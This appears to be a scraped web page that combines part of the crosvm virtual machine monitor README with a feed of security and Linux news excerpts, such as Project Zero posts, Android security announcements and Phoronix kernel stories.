    If the control socket was enabled with -s, the main process can be controlled while crosvm is running. To tell crosvm to stop and exit, for example:

    NOTE: If the socket path given is for a directory, a socket name underneath that path will be generated based on crosvm's PID.

    $ crosvm run -s /run/crosvm.sock ${USUAL_CROSVM_ARGS} <in another shell> $ crosvm stop /run/crosvm.sock 

    WARNING: The guest OS will not be notified or gracefully shutdown.

    This will cause the original crosvm process to exit in an orderly fashion, allowing it to clean up any OS resources that might have stuck around if crosvm were terminated early.

    Multiprocess Mode

    By default crosvm runs in multiprocess mode. Each device that supports running inside of a sandbox will run in a jailed child process of crosvm. The appropriate minijail seccomp policy files must be present either in /usr/share/policy/crosvm or in the path specified by the --seccomp-policy-dir argument. The sandbox can be disabled for testing with the --disable-sandbox option.

    Virtio Wayland

    Virtio Wayland support requires special support on the part of the guest and as such is unlikely to work out of the box unless you are using a Chrome OS kernel along with a termina rootfs.

    To use it, ensure that the XDG_RUNTIME_DIR enviroment variable is set and that the path $XDG_RUNTIME_DIR/wayland-0 points to the socket of the Wayland compositor you would like the guest to use.

    Defaults

    The following are crosvm's default arguments and how to override them.

    • 256MB of memory (set with -m)
    • 1 virtual CPU (set with -c)
    • no block devices (set with -r, -d, or --rwdisk)
    • no network (set with --host_ip, --netmask, and --mac)
    • virtio wayland support if XDG_RUNTIME_DIR enviroment variable is set (disable with --no-wl)
    • only the kernel arguments necessary to run with the supported devices (add more with -p)
    • run in multiprocess mode (run in single process mode with --disable-sandbox)
    • no control socket (set with -s)

    System Requirements

    A Linux kernel with KVM support (check for /dev/kvm) is required to run crosvm. In order to run certain devices, there are additional system requirements:

    • virtio-wayland - The memfd_create syscall, introduced in Linux 3.17, and a Wayland compositor.
    • vsock - Host Linux kernel with vhost-vsock support, introduced in Linux 4.8.
    • multiprocess - Host Linux kernel with seccomp-bpf and Linux namespacing support.
    • virtio-net - Host Linux kernel with TUN/TAP support (check for /dev/net/tun) and running with CAP_NET_ADMIN privileges.

    Emulated Devices

    DeviceDescription
    CMOS/RTCUsed to get the current calendar time.
    i8042Used by the guest kernel to exit crosvm.
    serialx86 I/O port driven serial devices that print to stdout and take input from stdin.
    virtio-blockBasic read/write block device.
    virtio-netDevice to interface the host and guest networks.
    virtio-rngEntropy source used to seed guest OS's entropy pool.
    virtio-vsockEnabled VSOCKs for the guests.
    virtio-waylandAllowed guest to use host Wayland socket.

    Contributing

    Code Health

    build_test

    There are no automated tests run before code is committed to crosvm. In order to maintain sanity, please execute build_test before submitting code for review. All tests should be passing or ignored and there should be no compiler warnings or errors. All supported architectures are built, but only tests for x86_64 are run. In order to build everything without failures, sysroots must be supplied for each architecture. See build_test -h for more information.

    rustfmt

    All code should be formatted with rustfmt. We have a script that applies rustfmt to all Rust code in the crosvm repo: please run bin/fmt before checking in a change. This is different from cargo fmt --all which formats multiple crates but a single workspace only; crosvm consists of multiple workspaces.

    Dependencies

    With a few exceptions, external dependencies inside of the Cargo.toml files are not allowed. The reason being that community made crates tend to explode the binary size by including dozens of transitive dependencies. All these dependencies also must be reviewed to ensure their suitability to the crosvm project. Currently allowed crates are:

    • byteorder - A very small library used for endian swaps.
    • cc - Build time dependency needed to build C source code used in crosvm.
    • libc - Required to use the standard library, this crate is a simple wrapper around libc's symbols.

    Code Overview

    The crosvm source code is written in Rust and C. To build, crosvm generally requires the most recent stable version of rustc.

    Source code is organized into crates, each with their own unit tests. These crates are:

    • crosvm - The top-level binary front-end for using crosvm.
    • devices - Virtual devices exposed to the guest OS.
    • io_jail - Creates jailed process using libminijail.
    • kernel_loader - Loads elf64 kernel files to a slice of memory.
    • kvm_sys - Low-level (mostly) auto-generated structures and constants for using KVM.
    • kvm - Unsafe, low-level wrapper code for using kvm_sys.
    • net_sys - Low-level (mostly) auto-generated structures and constants for creating TUN/TAP devices.
    • net_util - Wrapper for creating TUN/TAP devices.
    • sys_util - Mostly safe wrappers for small system facilities such as eventfd or syslog.
    • syscall_defines - Lists of syscall numbers in each architecture used to make syscalls not supported in libc.
    • vhost - Wrappers for creating vhost based devices.
    • virtio_sys - Low-level (mostly) auto-generated structures and constants for interfacing with kernel vhost support.
    • vm_control - IPC for the VM.
    • x86_64 - Support code specific to 64 bit intel machines.

    The seccomp folder contains minijail seccomp policy files for each sandboxed device. Because some syscalls vary by architecture, the seccomp policies are split by architecture.

    ...more

    Over The Air - Vol. 2, Pt. 2: Exploiting The Wi-Fi Stack on Apple Devices

    Published: 2019-03-07 22:48:36

    Popularity: None

    Author: Posted by

    Posted by Gal Beniamini, Project Zero In this blog post we’ll continue our journey towards over-the-air exploitation of the iPhone, by ...

    ...more

    Lock it up! New hardware protections for your lock screen with the Google Pixel 2

    Published: 2019-03-07 22:42:54

    Popularity: None

    Author: Posted by Xiaowen Xin, Android Security Team

    Posted by Xiaowen Xin, Android Security Team The new Google Pixel 2 ships with a dedicated hardware security module designed to be robust a...

    ...more

    OWASP is pleased to announce the release of the OWASP Top 10 - 2017

    Published: 2019-03-07 22:41:58

    Popularity: None

    Author: Posted by

    After a difficult gestation, the OWASP Top 10 Final is out. You can get it from here:    https://github.com/OWASP/Top10/tree/master/2017 ...

    ...more

    Reading privileged memory with a side-channel

    Published: 2019-03-07 22:35:55

    Popularity: None

    Author: Posted by

    Posted by Jann Horn, Project Zero We have discovered that CPU data cache timing can be abused to efficiently leak information out of mi...

    ...more

    Android Security Ecosystem Investments Pay Dividends for Pixel

    Published: 2019-03-07 22:34:48

    Popularity: None

    Author: Posted by Mayank Jain and Scott Roberts, Android security team

    Posted by Mayank Jain and Scott Roberts, Android security team [Cross-posted from the Android Developers Blog ] In June 2017, the Androi...

    ...more

    EFF and Lookout Uncover New Malware Espionage Campaign Infecting Thousands Around the World

    Published: 2019-03-07 22:34:40

    Popularity: None

    Author: by Nate Cardozo

    San Francisco – The Electronic Frontier Foundation (EFF) and mobile security company Lookout have uncovered a new malware espionage campaign infecting thousands of people in more than 20 countries. Hundreds of gigabytes of data has been stolen, primarily through mobile devices compromised by fake...

    ...more

    Zero-day vulnerability in Telegram

    Published: 2019-03-07 22:31:50

    Popularity: None

    Author: By

    In October 2017, we learned of a vulnerability in Telegram Messenger’s Windows client that was being exploited in the wild. It involves the use of a classic right-to-left override attack when a user sends files over the messenger service.

    ...more

    Android Security 2017 Year in Review

    Published: 2019-03-07 22:28:36

    Popularity: None

    Author: Posted by Dave Kleidermacher, Vice President of Security for Android, Play, ChromeOS

    Posted by Dave Kleidermacher, Vice President of Security for Android, Play, ChromeOS Our team’s goal is simple: secure more than two billi...

    ...more

    Total Meltdown?

    Published: 2019-03-07 22:27:11

    Popularity: None

    Author: Posted by

    Did you think Meltdown was bad? Unprivileged applications being able to read kernel memory at speeds possibly as high as megabytes per seco...

    ...more

    DNS over TLS support in Android P Developer Preview

    Published: 2019-03-07 22:24:45

    Popularity: None

    Author: Posted by Erik Kline, Android software engineer, and Ben Schwartz, Jigsaw software engineer

    Posted by Erik Kline, Android software engineer, and Ben Schwartz, Jigsaw software engineer [Cross-posted from the Android Developers Blog...

    ...more

    Google CTF 2018 is here

    Published: 2019-03-07 22:22:31

    Popularity: None

    Author: Posted by Jan Keller, Security TPM

    Posted by Jan Keller, Security TPM Google CTF 2017 was a big success! We had over 5,000 players, nearly 2,000 teams captured flags, we pai...

    ...more

    PeerTube, the “Decentralized YouTube”, succeeds in crowdfunding

    Published: 2019-03-07 22:16:08

    Popularity: None

    Author: Published by

    It is done. With 53,100 euros collected in forty-two days, the PeerTube project originating in France blows through its initial goal. The principle is intriguing: a fully decentralized version of YouTube , whose computer code is freely accessible and editable, and where videos are shared between users without relying on a central system. Online since March 2018 in a beta version, the … Continue reading PeerTube, the “Decentralized YouTube”, succeeds in crowdfunding →&lt;!-- AddThis Advanced Settings above via filter on get_the_excerpt --&gt;&lt;!-- AddThis Advanced Settings below via filter on get_the_excerpt --&gt;&lt;!-- AddThis Advanced Settings generic via filter on get_the_excerpt --&gt;&lt;!-- AddThis Share Buttons above via filter on get_the_excerpt --&gt;&lt;!-- AddThis Share Buttons below via filter on get_the_excerpt --&gt;&lt;!-- AddThis Share Buttons generic via filter on get_the_excerpt --&gt;

    ...more

    Introducing the Tink cryptographic software library

    Published: 2019-03-07 22:11:20

    Popularity: None

    Author: Posted by Thai Duong, Information Security Engineer, on behalf of Tink team

    Posted by Thai Duong, Information Security Engineer, on behalf of Tink team At Google, many product teams use cryptographic techniques to ...

    ...more

    Professional 2.0.04beta

    Published: 2019-03-07 22:11:14

    Popularity: None

    Author: Posted by

    This release contains a number of bugfixes. Note:  This is an incremental update to the Burp 2.0  beta release , and the same caveats appl...

    ...more

    Enterprise Edition 1.0beta

    Published: 2019-03-07 22:11:11

    Popularity: None

    Author: Posted by

    This is a brand new product. See today's blog post announcement for full details. Note that this is a beta release . It may contain bugs,...

    ...more

    Google and Android have your back by protecting your backups

    Published: 2019-03-07 22:08:15

    Popularity: None

    Author: Posted by Troy Kensinger, Technical Program Manager, Android Security and Privacy

    Posted by Troy Kensinger, Technical Program Manager, Android Security and Privacy Android is all about choice. As such, Android strives to...

    ...more

    Modernizing Transport Security

    Published: 2019-03-07 22:08:03

    Popularity: None

    Author: Posted by David Benjamin, Chrome networking

    Posted by David Benjamin, Chrome networking *Updated on October 17, 2018 with details about changes in other browsers TLS (Transport Lay...

    ...more

    Android Protected Confirmation: Taking transaction security to the next level

    Published: 2019-03-07 22:07:48

    Popularity: None

    Author: Posted by Janis Danisevskis, Information Security Engineer, Android Security

    Posted by Janis Danisevskis, Information Security Engineer, Android Security [Cross-posted from the Android Developers Blog ] In Android...

    ...more

    The New Restartable Sequences System Call Is Living Up To Its Performance Claims - Phoronix

    Published: 2019-03-07 22:07:04

    Popularity: None

    Author: Written by

    Introduced in the Linux 4.18 kernel was the

    Restartable Sequences "rseq" system call

    intended to yield faster user-space operations on per-CPU data. As covered during a presentation at this week's Open-Source Summit Europe, that system call is indeed providing performance wins while it's not widely utilized yet.

    The restartable sequences system call allows for faster performance in per-CPU data updates from user-space for items like incrementing per-CPU counters, modifying data protected by per-CPU spinlocks, reading/writing per-CPU ring buffers, and similar operations while the kernel guarantees atomic behavior. The RSEQ system call was merged for Linux 4.18 while in the newly-released Linux 4.19 kernel the syscall is supported on ARM64 and other architectures.

    There still is ongoing work for improving Restartable Sequences especially with utilizing this syscall from different key components in the Linux user-space, but it's looking like the performance benefits are worthwhile. Mathieu Desnoyers of EfficiOS presented at this week's Open-Source Summit Europe in Edinburgh where he covered this interesting kernel work. The benchmark results are what excited us the most:

    Those wishing to learn more about the ongoing RSEQ syscall and weren't able to make it to Edinburgh for the event, Desnoyers' slide deck can be viewed

    here

    (PDF). There is also another presentation by Mathieu back from

    Linux Plumbers 2016

    with more background information on this system call if you are interested in more reading this weekend.

    ...more

    iPhones are Allergic to Helium

    Published: 2019-03-07 22:06:22

    Popularity: None

    Author: written by

    This is the kind of tale that you don’t hear every day.  During the installation of a new MRI machine, a technician started getting calls that iPhones weren’t working—but Androids were just fine.

    ...more

    Introducing reCAPTCHA v3: the new way to stop bots

    Published: 2019-03-07 22:06:08

    Popularity: None

    Author: Posted by Wei Liu, Google Product Manager

    Posted by Wei Liu, Google Product Manager [Cross-posted from the Google Webmaster Central Blog ] Today, we’re excited to introduce reCAP...

    ...more

    Introducing the Android Ecosystem Security Transparency Report

    Published: 2019-03-07 22:05:51

    Popularity: None

    Author: Posted by Jason Woloz and Eugene Liderman, Android Security & Privacy Team

    Posted by Jason Woloz and Eugene Liderman, Android Security &amp; Privacy Team Update: We identified a bug that affected how we calculated dat...

    ...more

    Google Public DNS now supports DNS-over-TLS

    Published: 2019-03-07 22:00:16

    Popularity: None

    Author: Posted by Marshall Vale, Product Manager and Puneet Sood, Software Engineer

    Posted by Marshall Vale, Product Manager and Puneet Sood, Software Engineer Google Public DNS is the world’s largest public Domain Name Se...

    ...more

    Vulnerability Spotlight: Python.org certificate parsing denial-of-service

    Published: 2019-03-07 21:58:43

    Popularity: None

    Author: Posted by

    A blog from the world class Intelligence Group, Talos, Cisco's Intelligence Group

    ...more

    Open sourcing ClusterFuzz

    Published: 2019-03-07 21:58:06

    Popularity: None

    Author: Posted by Abhishek Arya, Oliver Chang, Max Moroz, Martin Barbella and Jonathan Metzman (ClusterFuzz team)

    Posted by Abhishek Arya, Oliver Chang, Max Moroz, Martin Barbella and Jonathan Metzman (ClusterFuzz team) [Cross-posted from the Google Op...

    ...more

    Introducing Adiantum: Encryption for the Next Billion Users

    Published: 2019-03-07 21:58:05

    Popularity: None

    Author: Posted by Paul Crowley and Eric Biggers, Android Security & Privacy Team

    Posted by Paul Crowley and Eric Biggers, Android Security &amp; Privacy Team Storage encryption protects your data if your phone falls in...

    ...more

    A peek into build provenance for Homebrew

    Published: 2024-05-14 14:00:58

    Popularity: None

    Author: blog.trailofbits.com by yossarian

    Keywords:

  • ruby
  • security
  • cryptography
  • Comments

    ...more

    Re: Crowdstrike Timeline Mystery

    Published: 2024-07-30 15:44:20

    Popularity: None

    Author: by Garbi

    Keywords:

  • security
  • ask
  • 🤖: "Mystery solved GIF: "Plot Twist""

    https://lobste.rs/s/t2hj6o/crowdstrike_timeline_mystery https://www.bitsight.com/blog/crowdstrike-timeline-mystery In the comments on this article, I asked a question that no one answered and it’s still bugging me so I’ll ask it again: How does one company know so much about another company’s traffic?

    ...more

    UBIFS File-System Being Hardened Against Power Loss Scenarios

    Published: 2024-07-28 23:19:25

    Popularity: None

    Author: Written by

    🤖: "Battery backup mode"

    While most Linux file-systems are rather robust in recovering when the system experiences a power loss, the UBIFS file-system is more prone to problems when a power-cut happens

    ...more

    Open-source fine-grained authorization service inspired by Google Zanzibar

    Published: 2024-08-28 15:55:44

    Popularity: None

    Author: github.com by eaytin

    Keywords:

  • security
  • go
  • scaling
  • show
  • 🤖: ""Authorization zone""

    Show HN: Permify 1.0 - Open-source fine-grained authorization service Permify was born out of our repeated struggles with authorization. Like any other piece of software, authorization starts small but as things grow scaling it becomes a real pain and begins to hinder product development processes. Ad-hoc authorization systems scattered throughout your app’s codebase are hard to manage, reason about, and iterate on as the company grows. Also you will need to have more specific access controls as things grow. Traditional approaches like RBAC is inefficient for defining granular permissions such as resource-specific, hierarchical, or context-aware permissions. Architecture is another problem, in a distributed system you’re going to need a solid plan to manage permissions between your services — all while ensuring high availability and providing low latency in access checks for sure. We’ve created an open-source project to eliminate the authorization burden for devs. It’s Permify, an Authorization-as-a-Service to help developers build and manage their authorization in a scalable, secure, and extendable manner. And last week, we released the first major version (v1.0.0) of it! Here is how Permify helps you handle authorization. - Centralize &amp; Standardize Your Authorization: Abstract your authorization logic from your codebase and application logic to easily reason, test, and debug your authorization. Treat your authorization as a sole entity and move faster within your core development. - Build Granular Permissions For Any Case You Have: You can create granular (resource-specific, hierarchical, context aware, etc) permissions and policies using Permify’s domain specific language that is compatible with RBAC, ReBAC and ABAC. - Set Custom Authorization For Your Tenants: Set up isolated authorization logic and custom permissions for your vendors/organizations (tenants) and manage them in a single place. - Scale Your Authorization As You Wish: Achieve lightning-fast response times down to 10ms for access checks with a proven infrastructure inspired by Google Zanzibar, Google’s Consistent, Global Authorization System. Try it out and send any feedback our way! Comments

    ...more

    NVIDIA Publishes Open-Source Linux Driver Code For GPU Virtualization "vGPU" Support

    Published: 2024-09-25 17:23:39

    Popularity: None

    Author: Written by

    🤖: "gpu party"

    NVIDIA engineers have sent out an exciting set of Linux kernel patches for enabling NVIDIA vGPU software support for virtual GPU support among multiple virtual machines (VMs)

    ...more

    "100% Free" GNU Boot Discovers Again They Have Been Shipping Non-Free Code

    Published: 2024-10-20 00:52:58

    Popularity: None

    Author: Written by

    🤖: "Linux fail 😒👀"

    GNU Boot is a '100% free software project aimed at replacing the non-free boot software' and is a downstream of Coreboot, GRUB, and SeaBIOS

    ...more

    OpenPaX Announced As "Open-Source Alternative To GrSecurity" With Free Kernel Patch

    Published: 2024-10-31 12:42:08

    Popularity: None

    Author: Written by

    🤖: "Kernel patch party"

    Enterprise security firm Edera today is announcing OpenPaX that they promoted in their advance press notice as a 'new open-source alternative to GrSecurity.' GrSecurity being the firm focused on providing out-of-tree Linux kernel patches focused in the name of security enhancements

    ...more

    end